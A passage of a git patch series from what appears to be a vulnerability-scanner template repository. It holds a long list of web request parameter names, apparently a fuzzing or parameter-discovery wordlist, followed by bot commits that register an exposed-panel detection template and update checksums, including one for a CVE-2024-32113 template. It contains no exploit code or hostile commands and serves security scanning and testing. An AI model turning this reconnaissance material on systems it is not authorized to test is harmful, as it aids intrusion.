+wpui-script +wpui-style +wpurl +wpv +wpvf_page +wpvf_referrer +wpw +wpxmzw +wpz +wq +wqb +wqrczk +wqseia +wqzvbn +wr +wr-cf-gadget +wr_id +wr_pr +wr_subject +wrap +wrap_init_time +wrap_responses +wrapodata +wrapoutputclass +wrapped +wrapper +wrapper_active +wrapper_border +wrapper_class +wrapper_count +wrapper_group +wrapper_id +wrapper_version +wrapperid +wrapto +wratio +wraw +wrc +wrcid +wrcont +wrd +wrd_redirect +wrdauth_logincontrol +wrdcnt +wre-ajax +wren-theme-options +wreply +wres +wres_id +wresp +wresult +wrf +wrh +wri +wrid +write +write_btn +write_key +write_link +writedata +writer +writer_id +writereviewlink +wrk +wrm +wrn +wro +wrong +wrp +wrqln +wrqtep +wrs +wrtcips +wrvcxq +wrvncc +wrw +wrwnhx +wrx +wrxezg +wry +wryroq +wrz_shop_id +ws +ws-email-login +ws-is-ajax +ws-token +ws-v +ws_ajax_ref +ws_ajax_rsf +ws_azione_intra +ws_checksum +ws_controller +ws_function +ws_hmac +ws_id +ws_init_at +ws_key +ws_loadtpl_ajax +ws_login_intra +ws_password_intra +ws_referer +wsa-ajax +wsa_custom_str +wsaid +wsc +wscale +wscd +wschatid +wscompression +wscount +wscs +wsd +wsdl +wsdnok +wser +wsf_cid +wsf_ism +wsf_page +wsf_pid +wsf_sid +wsf_skin_id +wsf_title +wsfunction +wsg +wsgsig +wsh +wshop +wshow +wshp +wsi +wsid +wsidchk +wsip +wsiphost +wsize +wsizetab +wsjrhp +wsjzsf +wsk +wskey +wslulw +wsm +wsn +wsname +wsp +wspagepublic +wspd +wspm +wspublico +wsql +wsrc +wsrh +wsrw +wss +wssid +wssvif +wst +wstoken +wstype +wsu +wsucxt +wsv +wsvar +wsver +wsw +wswidth +wswwdws +wswy +wsy +wsyvib +wsz +wszystkiemieszkania +wt +wt_code +wt_ct +wt_date +wt_domain +wt_mc +wt_skey +wt_st +wt_uuid +wta +wtb +wtbc +wtbid +wtbr +wtc +wtcdhi +wtd +wtdjes +wtdn +wte +wtf +wtfb +wtfftb +wth +wthnfp +wthuun +wtid +wtime +wtime-since-ad +wtimeout +wtit +wtitle +wtk +wtkps +wtl +wtle +wtlocale +wtlt +wtlv +wtm +wtmk +wtmkg +wtmkh +wtmkw +wtn +wtndvi +wtok +wtoken +wtop +wtpqui +wtr +wtrd_offer_id +wtrd_offer_lids +wtrd_offer_pids +wtrealm +wtrt +wts +wtsd +wtsid +wtsr +wtt +wttbc +wttc +wttf +wttsz +wttt +wtu +wtud +wtv +wtxf +wtxsz +wtxt +wty +wtype +wu +wua +wudxbj +wuhtuk +wuid +wuidui +wuji_appid +wuji_appkey +wul +wuni +wunit +wunits +wunschberater +wuo +wuqaaj +wurl +wuserid +wuuid +wuv +wuz +wv +wv-check +wv-hit +wv-part +wv-type +wv_res +wvb +wvc +wvd +wver +wversion +wvh +wvid +wvideo +wvr +wvrdzw +wvu +wvurl +ww +ww_c +ww_sitepath +wwidth +wwk +wwkf +wwktdp +wwlang +wwm +wwname +wwnick +wwnnqg +wws +wwuajf +wwv +www +www_url +www_version +wwwwww +wwy +wwynuk +wx +wx_app_id +wx_co +wx_fmt +wx_lazy +wx_navbar_hidden +wx_openid +wx_small_version +wx_spider_id +wx_station +wx_version +wxdssx +wxecrt +wxfmt +wxfrom +wxh +wxhr +wxhsxi +wxloginkey +wxtype +wxuid +wxyoit +wy +wybordzielnic +wyeqhs +wykod +wyl_version +wylid +wym +wypver +wys +wysija-page +wysija_form +wysijap +wysiwyg +wysokosc +wyva +wyw +wyy +wz +wz_beacon +wz_session_id +wz_utms +wzcookie +wzgkvs +wzid +wzkey +wzlx +wzn +wzoverride +wzp +wzucch +wzz +x +x-access-range +x-access-token +x-ais-classified +x-algolia-agent +x-amz-acl +x-amz-cf-id +x-amz-limitrate +x-amz-user-agent +x-amzn-trace-id +x-analytics-key +x-anotea-widget +x-api-eid-token +x-api-key +x-apikey +x-app-device +x-app-editor +x-app-id +x-app-name +x-app-navigator +x-app-platform +x-app-version +x-arrival-lock +x-auth-token +x-bce-process +x-biz-type +x-bwin-accessid +x-bz-cred +x-bz-exp +x-bz-signature +x-canva-quality +x-ch +x-chatgen-user +x-city +x-cli-msg +x-client-brkrver +x-client-id +x-client-ver +x-cm +x-complete +x-context +x-cors-version +x-country +x-csrf-token +x-currency +x-cxsegids +x-data-source +x-dc +x-device +x-device-id +x-domain +x-dp +x-e +x-echo +x-eko-sw-cache +x-email +x-expires +x-fds-process +x-fix-page-num +x-force-cache +x-fss-source +x-g +x-global +x-goog-signature +x-gtm-as +x-gw-current-app +x-h +x-id +x-ie-time +x-image-process +x-img-process +x-instid +x-key +x-kpsdk-im +x-kpsdk-v +x-l +x-lang +x-language +x-lbg-session-id +x-li-ambry-ep +x-m +x-method +x-msg +x-mt-auth +x-mt-credential +x-mt-signature +x-mt-timestamp +x-nimb-auth +x-oanalytics +x-object-details +x-object-name +x-object-urls +x-obs-expires +x-obs-signature +x-ocs-process +x-oekobox-sid +x-off-s +x-onet-app +x-oo-apikey +x-oo-uuid +x-oss-process +x-other-desktops +x-platform +x-pn +x-pxid +x-r +x-react +x-redirect +x-ref +x-req +x-request +x-request-id +x-requested-with +x-route-prefix +x-rs-key +x-s +x-sc-trace-id +x-sch +x-security-token +x-sender +x-served-for +x-service +x-service-name +x-shop +x-sid +x-sign +x-signature +x-site +x-site-id +x-siteid +x-skip-challenge +x-snr-skip +x-src +x-sw +x-t +x-tab-id +x-tenant-id +x-time +x-token +x-tos-process +x-total-bytes +x-type +x-u +x-ubid +x-uid +x-unblu-apikey +x-user-agent +x-user-mask +x-user-ref +x-uuid +x-ver +x-version +x-versiontype +x-view-mode +x-w +x-x +x-y +x-zp-client-id +x_ +x_account +x_ajax_id +x_api_key +x_api_secret +x_app +x_app_id +x_ark_access_id +x_ark_auth_type +x_ark_expires +x_ark_signature +x_auth_token +x_cg_pro_api_key +x_client +x_client_type +x_csrf +x_device_hash +x_di +x_domain +x_fastly_origin +x_fl +x_gdpr_f +x_gg +x_global_market +x_gr +x_jv +x_load +x_localisation +x_max +x_min +x_module +x_mp +x_offset +x_os_type +x_pagetype +x_pd +x_position +x_price +x_qt +x_quadro +x_r +x_ra +x_request_id +x_shift +x_sign_token +x_size +x_sl +x_sp +x_started +x_tenant +x_tenant_id +x_ti +x_uid +x_user_agent +x_venue +x_version +x_widget +xa +xaa +xaack +xabej +xact +xact_id +xaction +xae +xahyof +xai +xaid +xajax +xajaxargs +xajaxjs +xakbjb +xam +xamcec +xamzn +xandr_id +xandr_uid +xapp +xapsi +xaq +xar_id +xatf +xatfs +xature +xav +xaxis_domain +xaxis_hash +xaxis_pathname +xaxis_referrer +xaxis_title +xaxis_url +xb +xbackground +xbanlo +xbd +xbkpea +xbrd +xbv +xc +xc_dlfs +xc_erf +xcache +xcampaigns +xcase +xcat +xcb +xccp +xcd +xcdxdc +xcf +xcg +xch +xcid +xck +xck_channel +xclk +xcm +xcmd +xcms_snippet +xco +xcode +xcomponent +xcontenttype +xcp +xcrid +xcsoms +xctovw +xcu +xculture +xcv +xcx +xcyazu +xd +xd_origin_host +xda +xdata +xdblpo +xdbxjz +xdc +xdebug +xdef +xdefault +xdefcc +xdencpm +xdesc +xdgh +xdi +xdid +xdl +xdm +xdm_c +xdm_e +xdm_o +xdm_p +xdm_url +xdmframe +xdnwzb +xdom +xdomain_list +xds +xdskyd +xdt +xdufjj +xdv +xdverid +xdxjso +xe +xemail +xempty +xemumr +xero +xet +xevuzf +xf +xfbml +xfc +xfd +xfg +xfhhok +xfhkew +xflag +xflfzk +xfmp +xfnghj +xfppiu +xfrom +xfsub +xft +xft-base +xft-path +xft-txnid +xfvljg +xfyoyb +xfyzia +xg +xg_token +xgclid +xgdpr +xgdpr_consent +xgeo +xgid +xgip +xgn +xgr +xgt +xguid +xgvgov +xh +xh_proxy +xh_social_captcha +xhash +xhc +xheight +xhint +xhms_pro +xhprof +xhqogk +xhr +xhr-page +xhr_action +xhr_func +xhr_request +xhr_url +xhroption +xhrview +xhrvirtuemart_category_id +xhrvirtuemart_product_id +xhtml +xhttp +xi +xia +xiabing +xiaoqu +xiaqucode +xid +xid_ch +xidxu +xifd +ximg +ximgid +xinfo +xing +xitemcode +xityfy +xiugaiguo +xiuxkza +xj +xj_event_default +xj_group_default +xj_user_default +xj_video_default +xjf +xjfpwh +xjg +xjgasd +xjm +xjn +xjroon +xjs +xjugcm +xjxargs +xjxcls +xjxevt +xjxfun +xjxmthd +xka +xkdras +xkg +xkksnp +xkornn +xkq +xkyngr +xl +xla +xlact +xlang +xlarge +xlat +xlc +xlcon +xld +xldir +xlel +xlib +xlink +xll +xlm +xlnvbe +xlo +xload +xlon +xlp +xlqtcl +xlsxid +xluid +xlunm +xm +xm-v +xma +xman_goto +xman_us_t +xmapp +xmas +xmax +xmd +xmff +xmid +xmin +xmjbj +xmkad +xml +xml_date +xml_file +xml_id +xml_path +xml_request +xmlbtn +xmlc +xmldata +xmldump +xmlfile +xmlhttp +xmlid +xmlkes +xmlmenunblevel +xmlns +xmls +xmlurl +xmlzod +xmmoek +xmod +xmode +xmqxch +xms +xmsg +xmtp +xmv +xmxiha +xmymbf +xmyod +xn_auth +xn_out +xn_version +xname +xnayjc +xng +xnlp +xno +xnr +xnt +xnum +xnver +xnyocg +xo +xoadf +xoaf +xobt +xoc +xof +xoffset +xogki +xohafw +xoid +xonly +xoobkj +xoops_redirect +xorb +xorigin +xorp +xout +xovt +xoxouk +xp +xp_ag +xp_dir +xp_fla +xp_gears +xp_java +xp_pdf +xp_qt +xp_realp +xp_wma +xpa +xpage +xpartnerid +xpath +xpathinfo +xpb +xpc +xpgid +xpid +xpix +xpoll +xpos +xposition +xpq +xprf +xprod +xprops +xpscache +xpt +xpto +xpv +xpwcjo +xqa +xqgxdt +xqhcic +xqil +xqldbr +xqrvwo +xqtld +xqxvuh +xr +xr-client +xratio +xrdad +xrds +xredir +xref +xreg +xreplay_id +xrequestedwith +xres +xrfkey +xround +xrrntt +xrtb_id +xruntested +xrwogl +xs +xs_app +xs_file +xs_id_check +xsack +xsadrd +xsatyr +xsdata +xsdv +xsel +xseo +xsessionid +xsessiontag +xsgrvq +xsgutter +xsid +xsite +xsitename +xsize +xsjuib +xsl +xslfile +xslt +xslt-uri +xslurl +xsmall +xsource +xsource-rel-htaccess +xspilw +xsppcaller +xsqos +xsr +xsrbln +xsrc +xsrf +xsrf_token +xss +xssi +xssi_token +xssuyt +xst +xstream +xsv +xsvjd +xsyf +xt +xt-widget-fetch +xtags +xtc +xtehue +xtest +xtgyxb +xtid +xtile +xtiles +xtime +xtippk +xtm +xtm_campaign +xtm_content +xtm_medium +xtm_source +xtmp +xtn_auth +xto +xtoken +xtor +xtpt +xtr +xtreme_ps +xts +xtsid +xtt +xtuid +xtv +xtwqff +xtwwxj +xtype +xtzmuw +xtzmuwa +xu +xua +xuc +xuf +xufmyc +xui +xuid +xuly +xupado +xupqur +xur +xurl +xuser +xuserid +xuskrw +xustau +xuykss +xuyrzo +xv +xvalue +xvar +xvcid +xversion +xvgcf +xvh +xvobparamid +xvp +xvr +xvs_hqi +xvs_ogi +xvs_vwdwxv +xvs_vwulqj +xvstev +xvvmpt +xvw +xw +xw_item +xwapoo +xwaswd +xwc +xwhrpe +xwi +xwidth +xwl +xwm +xwmavc +xwt +xwv +xx +xxaaas +xxaxbv +xxc +xxdm +xxfgfg +xxfjcv +xxfxxe +xxislem +xxkkke +xxlg +xxpkmc +xxprog +xxroot +xxtrefer +xxvb +xxx +xxxaaa +xxxx +xxxxx +xxxxxxx +xxxxxxxx +xxz +xxzl_namespace +xxzl_staticvalue +xxzlbbid +xy +xy-context +xy_screen +xya +xyi +xynidu +xyz +xyz_lbx +xyzz +xz +xzgihi +xzgjzx +xzkpov +xzlcyo +xzn +xzqhbm +xzqstd +xzrjud +xzw +xzwb +xzx +xzz +y +y_gr +y_id +y_max +y_min +y_offset +y_position +y_quadro +y_shift +y_size +y_source +y_span_id +ya +ya_cid +ya_clid +ya_client_id +ya_counter +ya_target +yaa +yab +yabs-expboxes +yabs-expflags +yachik +yachin_hi +yachin_low +yacht +yaclientid +yaeifu +yago +yahid +yahoo +yahoo_color_bg +yahoo_color_border +yahoo_color_link +yahoo_color_price +yahoo_id +yahoo_team_id +yahoo_ver +yahoo_ydn_conv_io +yahoo_ydn_conv_label +yahoo_ydn_conv_value +yaht-ajax +yalign +yandex_cid +yandex_class +yandex_client_id +yandex_gid +yandex_id +yandex_login +yandexuid +yao +yaozh_version +yapfee +yard +yard_key +yardi_hosted +yarnweight +yaru +yarzrm +yav +yaw +yawa_dsfs +yawa_dsps +yawa_event_type +yawa_fsts +yawa_is_new_session +yawa_is_new_visitor +yawa_last_req +yawa_medium +yawa_mvt +yawa_nps +yawa_page_title +yawa_page_url +yawa_search_terms +yawa_session_id +yawa_site_id +yawa_source +yawa_timestamp +yawa_visitor_id +yawave-tool +yaxc +yay +yayforms-embed +yayforms-embed-id +yayforms-medium +yayforms-medium-version +yayforms-source +yazi_renk +yb +ybai +ybb +ybecag +ybfymt +ybjggu +ybmsd +ybnca_bbid +ybnca_erpm +ybnca_gbid +ybnca_vbid +ybnl +ybr +ybv +ybzgti +yc +yc_log +ycid +ycklet +yclid +ycmorg +ycnwhc +yco +ycofyl +ycrop +yd +ydaszc +yddjs +yde +ydkfyw +ydn +ydrxmf +ydsrim +yduuid +ye +year +year-month +year-statistic +year_built_min +year_col +year_end +year_filter +year_from +year_id +year_key +year_max +year_min +year_month +year_slug +year_start +year_to +yearbook +yearend +yearmonth +years +years_of_news +yearsonly +yearstats +yefhqc +yell +yellon +yellow +yellowavgmhper +yellowdiscards +yellowfan +yellowgessper +yellowgetfails +yellowrejects +yellowremfails +yellowstales +yellowtemp +yemmms +yeniyer +yep +yer +yes +yespornotube +yest +yesterday +yetiskin +yewecd +yeweug +yextrafield_roistat +yf +yfaquh +yfmt +yfshdg +yfusername +yfxcommon +yg +yg-ajax +yg_api +ygc_orgunit_id +ygcvserver +ygh +ygstart +ygxatk +ygxioo +ygyboi +yh +yhbrgg +yhdistys_id +yhelqe +yhgnov +yhint +yhma +yho +yhoid +yhs +yhst +yhu +yhulgk +yhuvlrq +yhvzpn +yi +yibgzq +yichsz +yid +yiecrt +yield_method +yield_opt_type +yieldify_id +yieldone +yielxm +yify +yiidxn +yijdju +yijicat +yil +yim +yip_csrf_token +yisqeg +yiyouliao_channel +yiz +yjbwlg +yjegnn +yjlwmn +yjs_id +yjs_name +yjzbpy +yk +yk_tag +yke +ykg +ykijvr +ykn +yko +ykoyod +ykqzvy +ykticn +ykuid +yl +ylb +yld_phnpms +yle_color_scheme +yle_country_code +yle_jspageurl +yle_page_name +yle_pageloadid +yle_selva +yle_timestamp +yle_vrs_product +ylg +ylh +yloysm +ylqpxzmtifbhgevrwujkdcnos +ylr +ylrtny +ylv +ym +ym_client_id +ym_id +ym_track +ym_uid +ymadvid +ymax +ymbwes +ymca +ymcart_client_country +ymcid +ymclid +ymd +ymd_from +ymd_to +ymdh +ymf +ymi +ymid +ymin +ymls_search +ymmurg +ymn +ympxaw +ymreqid +ymtyq +ymuid +yn +yn_dc +ynd +ynebdf +ynet +ynm-version +yno +ynqoef +ynqsmo +yo +yob +yoc_min +yocs +yod +yoffset +yogbdp +yoh +yoko +yoko_items +yol +yolo-custom-page +yoloc +yon +yongdo +yongdo_detail +yongtu +yonlendirme +yontem +yoomoney-payment-type +yopywv +yotei +you +young +your_booking +your_slug +yourname +youth +youto +youto_id +youtube +youtube-nocookie +youtube_enabled +youtube_feeds +youtube_id +youtube_module_id +youtube_showinfo +youtube_token +youtubeplayersize +youtubetype +youtubeusername +youtubevideoid +yoy_chart +yp +yp-wr-token +ypg +ypix +ypos +yposition +ypouge +yprapi_path +yprlij +ypro_id +yps-rand +yps-resize +ypv +ypwvwyl +yq +yqasio +yqd +yqhqieudsr +yqhzsd +yqjybr +yqkbbr +yqr +yqwik +yr +yratio +yrb +yredirect +yres +yrid +yritys +yrjeqb +yrjm +yrsncd +ys +ysco_key_store_id +ysdk +ysec +ysi +ysid +ysize +ysjzss +ysp_platform +ysp_redesign +ystart +yt +yt_id +yt_loop +yt_pt +yt_pvis +yt_sts +ytd +yte +ytee +ytext_hd +ytext_vi +ytext_viu +ytid +ytile +ytiles +ytk +ytp-pause-overlay +ytp_pause_overlay +ytpi +ytt +ytwrjj +ytxszw +ytype +yu +yudld +yui +yuid +yuksek +yukseklik +yum +yumaiq +yunid +yunpk +yuukxb +yuv +yuvikh +yuw +yuzuk-boyutu +yv +yv__rpl +yv_c +yvd +yvesresponsive +yvft +yvlg +ywhclp +yworg +ywq +ywqblk +ywtype +ywx +ywxarp +ywyvob +yx +yxd +yxe +yxfilepath +yxlbzx +yxnqd +yxt-header +yxw +yy +yy_ +yya +yycemm +yydxnc +yyegb +yyid +yymdyq +yymh +yymmdd +yytj +yytvtw +yyuid +yyy +yyyy +yyyymm +yz +yzcode +yzm +yzm_key +yzrwd +yztest +yzw +z +z-index +z_access_mode +z_ajax_time +z_canonical_url +z_ev_action +z_ev_data_one +z_ev_title +z_ev_type +z_evid +z_geolocation +z_httpscount +z_id +z_imgfirstloaded +z_index +z_layer +z_layout +z_loadscripttime +z_page_audience +z_page_category +z_page_language +z_rastermapcount +z_tilemaptime +za +za_id +zaanstreek +zab +zaction +zaehl +zaehler +zag +zahgcid +zahlen +zaid +zaius_js_version +zakaz_id_new +zakbcf +zakres +zalozka +zamereni +zamien +zanox_tracking_host +zanox_tracking_param +zanpid +zapc-api +zapc_pwa_inline +zapst +zarqem +zarsrc +zastavice +zaz +zazsxpt +zb +zbdfsv +zbg +zbid +zbior +zbl +zbnr +zbonewa +zbosd +zbouwjaarvan +zbp +zbrand +zbub +zburio +zbytes +zbz +zc +zc_cu +zc_cu_exp +zc_field_count +zc_from +zc_ownername +zc_to +zc_tp +zcache +zcarros +zcat +zcc +zcd +zcetqb +zch +zcid +zcl +zcluid +zcode +zcoeeh +zcol +zconsole +zcp +zcqaie +zcrzbp +zcs +zcs_lang +zct +zctry +zcur +zcve +zcvers +zcw +zcx +zd +zd_location +zd_pageview_id +zd_prefix +zd_session_id +zd_user_id +zd_user_mile +zdacew +zdccnt +zdfpqr +zdid +zdkf_type +zdmxnu +zdroj +zdy +zdybh +ze +zebra_stripe_color +zef +zefu +zeilen +zeit +zeitraum +zeitzone +zeko +zelle +zem +zeme +zemin +zemin_renk +zen-content-id +zencid +zend_image +zenid +zenith +zentraleid +zeo +zephr_sso_ott +zephyr_camping +zephyr_etab +zephyr_gammes +zephyr_room +zephyr_user +zeppelin +zero +zero_init +zero_options +zerofill +zeso +zezo +zf +zf-v +zf_enablecamera +zf_lang +zf_route +zf_rszfm +zfid +zflight_airlines +zflight_arrive_ccode +zflight_class +zflight_depart_ccode +zflight_depart_dt +zflight_depart_geo +zflight_passengers +zflight_return_dt +zflight_tripstart_days +zflight_type +zflights_arrive_airpt +zflights_arrive_day +zflights_depart_airpt +zflights_depart_day +zflights_pass_adult +zflights_pass_child +zflights_pass_infant +zflights_tripduration +zfligth_arrive_geo +zfon +zfrcd +zftlfk +zg_bg_color +zg_context +zg_group_id +zg_person_id +zg_set_id +zg_tag_mode +zg_tags +zgkun +zgmf +zgwckd +zh +zhcbqa +zheight +zhi +zhibo_id +zhid +zhiding +zhk_name +zhmgic +zhn +zhotel_adult +zhotel_child +zhotel_city_name +zhotel_infant +zhotel_name +zhotel_star +zhotel_stayduration +zhsd +zht +zhuangti +zhuantiid +zhv +zi +zid +zids +ziduan +ziel +zielformat +zielseite +zif +zignia +ziid +zikula_js +zimg +zimmer +zimmerab +zindex +zinio +zinterface +zip +zip-code +zip_code +zip_ds_id +zip_radius +zip_version +zipcode +zipcode_id +zipcode_source +zipcodemacro +zipcodes +zipip +zipname +zippost +zisc +zit +ziti +ziv +zj +zjzh +zk +zkb +zkbfd +zkey +zkfv +zkleur +zkmstand_tot +zl +zlan +zleft +zlerd +zlh +zll +zlo +zluuid +zm +zm_id +zmac +zmeneno +zmerk +zmethod +zmi +zmid +zmienna +zmkabw +zmod +zmode +zmodel +zmpid +zms +zmssf +zmwap +zn +znacka +znak +znakmini +znamka +zne +znid +znnid +zno +znw +znxid +znz +zo +zodiac +zodpovednost +zoek +zoeken +zoekterm +zoekwoord +zoid +zon +zona +zona_id +zonaid +zonasmarcadas +zone +zone-id +zone__zone +zone_ext +zone_h +zone_height +zone_id +zone_keys +zone_name +zone_place_id +zone_selezionate +zone_stringify_post +zone_type +zone_w +zone_width +zoned +zonefile +zoneguid +zoneid +zoneids +zonenav +zoneno +zones +zones-names +zones-types +zonestr +zonesub +zonet +zonetxt +zonetype +zonid +zoning +zoom +zoom-control +zoom_factor +zoom_level +zoom_lvl +zoom_molette +zoom_ratio +zoom_type +zoom_x +zoom_y +zoomcategories +zoomcompanies +zoomcontracttypes +zoomdir +zoomexperiencelevels +zoomfit +zoomfitp +zoomjobstatuses +zoomlevel +zoomlvl +zoomquality +zoomregions +zoomsectors +zoomslider +zoomtofit +zoomtype +zoomwheel +zoorate_affiliate +zoorate_widget_css +zoorate_widget_type +zp +zpage +zpartnerid +zpauth +zpay +zpb +zpbcat +zpbsub +zpg +zpi +zplx +zpos +zprijs_tot +zpu +zpw_type +zpw_ver +zq +zqh +zqund +zqy +zr +zre +zrecord +zredirect +zref +zreferer_ori +zrf +zrk +zrodlo +zrs +zrvt +zs +zs_new +zscat +zscqnl +zscript +zseo +zsfimg +zskn +zsn +zsoort +zspid +zstd +zt +ztgnd +ztime +ztm +ztmp +ztop +ztrans +zts +zttl +ztv +ztw +ztype +zu +zufall +zugriffsart +zuid +zurl +zusammensetzung +zustand +zv +zva +zvars +zvx +zw +zwe +zwh +zwid +zwidth +zwie +zwies +zwimg +zwnc +zwp +zwrot +zwrt +zwver +zww +zwwi +zx +zx_xz +zxc +zxcv +zxeud +zxr +zxrs +zxurl +zxx_ver +zxy +zy +zyc +zye +zyra_ga_id +zyusd +zyx +zz +zz_generic_id +zz_mixpanel_token +zz_val_eur +zzb +zzc +zzly +zzni +zzone +zzwindow +zzz +zzz_name +zzzzid +zzzzz From ee91785f92bc50c54b92550160ed1236265a418e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 16 Jun 2024 10:56:17 +0000 Subject: [PATCH 0250/1841] Auto Generated New Template Addition List [Sun Jun 16 10:56:17 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index dc916c44ab..b7f4a95a22 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ http/cves/2024/CVE-2024-32113.yaml http/cves/2024/CVE-2024-37393.yaml http/exposed-panels/lorex-panel.yaml http/exposed-panels/oracle-application-server-panel.yaml +http/exposed-panels/turnkey-lamp-panel.yaml http/exposed-panels/veeam-backup-manager-login.yaml http/exposed-panels/wildix-collaboration-panel.yaml http/misconfiguration/apache/apache-server-status-localhost.yaml From 3fe618362efd08f784c2b889630b1c0f89ec6515 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 16 Jun 2024 10:56:27 +0000 Subject: [PATCH 0251/1841] Auto Generated Templates Checksum [Sun Jun 16 10:56:27 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index cd82cdfd1c..59511e7514 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3314,7 +3314,7 @@ http/cves/2024/CVE-2024-31848.yaml:7897724f33b3fb2247e15f6c2904421c54586c6c http/cves/2024/CVE-2024-31849.yaml:3959023f6bd03c1ab24b2e711acd4683c98d8dbe http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca http/cves/2024/CVE-2024-31851.yaml:c68bf4f7214f9abb654a5bb11cd9088cdb1fe690 -http/cves/2024/CVE-2024-32113.yaml:db95c4c233c638afaef0c1165c9701956d1f7754 +http/cves/2024/CVE-2024-32113.yaml:d33bf2b38e8bb82edabfe4a94fa64fe2aed6cf56 http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c @@ -4505,6 +4505,7 @@ http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:d2198b812f4062c0f360e http/exposed-panels/truenas-scale-panel.yaml:56f855f113eb0d8fe648485a1ba0ea24988ae7da http/exposed-panels/tufin-securetrack-login.yaml:63c396fb780b3aa5de4176aea0e183338ef43943 http/exposed-panels/tup-openframe.yaml:8e6f0bcd762cdf9098621e8323e811b702424060 +http/exposed-panels/turnkey-lamp-panel.yaml:2d6eb631d45313951c315cee4e5b60b3b928fdca http/exposed-panels/turnkey-openvpn.yaml:499a14d9a3eb9ca68ffcf856cd357b8a552bf30b http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:4e116dbb08d4fa3bc3aed57ad47e38728f911996 @@ -8648,7 +8649,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0cd315bf4cdcba6e0f732f410530100428a746c4 +templates-checksum.txt:f4baae5fab36d61c84af14dbe8cdf1bccb8e39e0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 05a800d18382c189e30646e29e597e5d95fb33b6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 16 Jun 2024 10:57:01 +0000 Subject: [PATCH 0252/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 824546859a..9e207fe078 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,6 +17,7 @@ on: - 'http/cves/2024/CVE-2024-37393.yaml' - 'http/exposed-panels/lorex-panel.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' + - 'http/exposed-panels/turnkey-lamp-panel.yaml' - 'http/exposed-panels/veeam-backup-manager-login.yaml' - 'http/exposed-panels/wildix-collaboration-panel.yaml' - 'http/misconfiguration/apache/apache-server-status-localhost.yaml' From d9f55a5c7ecc42437fd3fd08ee36adf515a57707 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 16 Jun 2024 10:57:26 +0000 Subject: [PATCH 0254/1841] Auto Generated Templates Checksum [Sun Jun 16 10:57:26 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 59511e7514..dbd1113a13 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3958,7 +3958,7 @@ http/exposed-panels/ibm/ibm-dcec-panel.yaml:85de4a0aac53b7dd180b06e04f837e737a76 http/exposed-panels/ibm/ibm-decision-server-console.yaml:9bc550d72018a4bb6fd09c5466136ddfb003891e http/exposed-panels/ibm/ibm-maximo-login.yaml:aaf8da0bfec6d4b716d5f5eeba93337e0064ab21 http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac3321ab96befab9 -http/exposed-panels/ibm/ibm-note-login.yaml:66155682019a6922f6b68bc4125a86812de71879 +http/exposed-panels/ibm/ibm-note-login.yaml:62703fcdd67848e4200d872fd71bf8b635caa239 http/exposed-panels/ibm/ibm-odm-panel.yaml:a4b0d5f8dd884061a745fe85fea95887dc948e23 http/exposed-panels/ibm/ibm-security-access-manager.yaml:83faa8d7636cd912e030c69615cf5e6fa59e871c http/exposed-panels/ibm/ibm-service-assistant.yaml:900e28a644df1ddafc2074599f3606f7d150aab4 @@ -8649,7 +8649,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f4baae5fab36d61c84af14dbe8cdf1bccb8e39e0 +templates-checksum.txt:ed1f851e720de8a8450fbb782aec6a66deaa49d4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3a193dc8a254a966353a1550fe2648c49adc6fdc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 16 Jun 2024 10:58:20 +0000 Subject: [PATCH 0256/1841] Auto Template Signing [Sun Jun 16 10:58:20 UTC 2024] :robot: --- http/exposed-panels/turnkey-lamp-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/turnkey-lamp-panel.yaml 